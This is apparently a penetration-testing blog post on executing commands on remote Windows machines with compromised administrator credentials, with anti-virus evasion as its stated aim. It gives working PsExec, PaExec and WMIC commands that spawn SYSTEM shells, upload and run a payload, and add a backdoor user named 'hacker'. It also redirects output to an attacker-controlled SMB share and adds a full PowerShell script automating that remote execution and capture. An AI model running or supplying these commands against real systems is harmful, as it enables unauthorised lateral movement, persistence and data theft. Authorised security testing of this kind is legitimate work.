Alternative Ways To: Operate Windows Commands Remotely

Most penetration testers will know and love Metasploit's PsExec module for running commands on remote Windows machines. If you're not familiar with it: it lets you take a compromised Local Administrator account and use it to execute commands on the remote machine (or to upload Meterpreter, of course!). All of the methods below need the ability to write to the Admin$ share on the remote machine, which in practice means a Local Administrator account (and, where UAC remote restrictions are in place, usually the built-in Administrator or a domain admin rather than just any local admin).

Metasploit’s PsExec

It's available in Metasploit under exploit/windows/smb/psexec and all it requires is an RHOST, SMBUser and SMBPass (plus SMBDomain if the account is a domain account rather than a local one).

Sometimes, however, the psexec module from Metasploit gets eaten by anti-virus engines, which is frustrating and delays a tester going about their work. So here are a couple of tricks for getting around AV quickly, for when you just want to run your commands and get back to Starbucks.

PsTools and PsExec

Although Metasploit's PsExec is often picked up by anti-virus, I personally find that the original Sysinternals PsExec isn't! Which is most convenient; download it here and give it a try: https://technet.microsoft.com/en-gb/sysinternals/bb896649.aspx
It works something like this:
psexec \\TargetIP -u Admin -p Password1 cmd
(where "cmd" asks it to spawn an interactive command shell; add -accepteula on the first run to suppress the licence dialog). Bear in mind that PsExec works by copying PSEXESVC.exe to Admin$ and installing it as a service, so it leaves a service-installation event in the target's System log even when AV stays quiet.

PowerAdmin with PaExec

A nice alternative to PsExec is PaExec, available here: http://www.poweradmin.com/paexec/. Its usage is basically the same; try this:
PAExec \\TargetIP -u Admin -p Password1 -s cmd.exe
(-s runs the shell as SYSTEM rather than as the supplied user.) Don't feel like a command shell but instead want to upload your own tools (or a veil-evasion payload perhaps…)? Then give this one a shot:
PAExec \\TargetIP -u Admin -p Password1 -i -c Payload.exe
This will copy Payload.exe to the remote machine (-c) and execute it interactively on the console session (-i)!

WMIC

Finally, when all else fails I pull out WMIC. Although it's an older method, it seems to have fallen out of use and many testers I've worked with are either unaware of it or have forgotten it exists. Easy to use though, something like this:
wmic /node:TargetIP /username:Admin /password:Password1 process call create "net user hacker Hacker1 /add"
The commands here execute blindly (WMIC only reports whether the process was created and its PID, never its output), which any tester worth her salt can deal with, but a quick hack will get you the command output. Spin up a network share that can be written to by the compromised user (or "Everyone") and you can redirect the output to that SMB share. Note that the redirection has to go through cmd.exe /c: Win32_Process.Create just launches the executable and won't interpret >> on its own.
wmic /node:TargetIP /username:Admin /password:Password1 process call create "cmd.exe /c ipconfig >> \\AttackerIP\share\results.txt"
(Here "share" stands for whatever you named the writable share.) One caveat: WMIC is deprecated and isn't installed by default on recent Windows 11 builds, so check the target actually has it before relying on it.
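The same redirect-to-a-share trick, written as a PowerShell script around Invoke-WmiMethod so that the Create call is checked and the output file is read back rather than fired blindly. This is an added example, not code from the original post or from WMIC itself; TargetIP, the \\AttackerIP\results share and the 30-second timeout are assumptions, and it needs Windows PowerShell 5.1, since Invoke-WmiMethod was dropped from PowerShell 7 (where Invoke-CimMethod takes its place).

```powershell
# Added example: WMI remote process creation with output captured to an SMB share.
# Assumptions: TargetIP is the remote host, \\AttackerIP\results is a share the
# target's account can write to, and we are running in Windows PowerShell 5.1.
param(
    [string]$Target    = 'TargetIP',               # assumed remote host
    [string]$ShareRoot = '\\AttackerIP\results',   # assumed writable share on our box
    [string]$Command   = 'ipconfig /all',          # command whose output we want
    [int]   $TimeoutSec = 30
)

# Prompt once for the local admin credential instead of leaving the password
# in shell history, as the wmic /password: one-liner does.
$cred = Get-Credential -Message "Local administrator on $Target"

# Per-run output file so repeated runs against several hosts do not clobber each other.
$outFile = Join-Path $ShareRoot ("{0}-{1:yyyyMMdd-HHmmss}.txt" -f $Target, (Get-Date))

# Win32_Process.Create only launches an executable; redirection needs cmd.exe /c.
# 2>&1 also captures stderr, which the bare wmic one-liner would lose.
$cmdLine = "cmd.exe /c $Command > `"$outFile`" 2>&1"

# Create has one mandatory parameter (CommandLine); passing a single string is enough.
$result = Invoke-WmiMethod -ComputerName $Target -Credential $cred `
    -Class Win32_Process -Name Create -ArgumentList $cmdLine

# ReturnValue 0 means the process was created; anything else is a
# Win32_Process.Create error code (2 = access denied, 8 = unknown failure, ...).
if ($result.ReturnValue -ne 0) {
    throw "Win32_Process.Create failed on $Target with ReturnValue $($result.ReturnValue)"
}
Write-Host "Started PID $($result.ProcessId) on $Target; waiting for $outFile"

# The call returns as soon as the process exists, so poll for the file
# on our own share instead of guessing at a fixed sleep.
$deadline = (Get-Date).AddSeconds($TimeoutSec)
while (-not (Test-Path -LiteralPath $outFile) -and (Get-Date) -lt $deadline) {
    Start-Sleep -Milliseconds 500
}

if (Test-Path -LiteralPath $outFile) {
    Get-Content -LiteralPath $outFile
} else {
    Write-Warning ("No output after {0}s: check that {1} can reach {2} and that the share is writable " +
                   "by the account the process runs under") -f $TimeoutSec, $Target, $ShareRoot
}
```

Save it as, say, Invoke-WmiCapture.ps1 and run `.\Invoke-WmiCapture.ps1 -Target 10.0.0.5 -Command 'whoami /all'`. Unlike PsExec nothing is copied to Admin$ and no service is installed, but the remote cmd.exe is still spawned by WmiPrvSE.exe, which is exactly the parent/child pair most endpoint detection rules look for, and the output file remains on your share, not on the target.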
So that's a few different ways of achieving the same thing; more often than not it's good to have a Plan B and a Plan C, especially when anti-virus is getting a bit too big for its boots!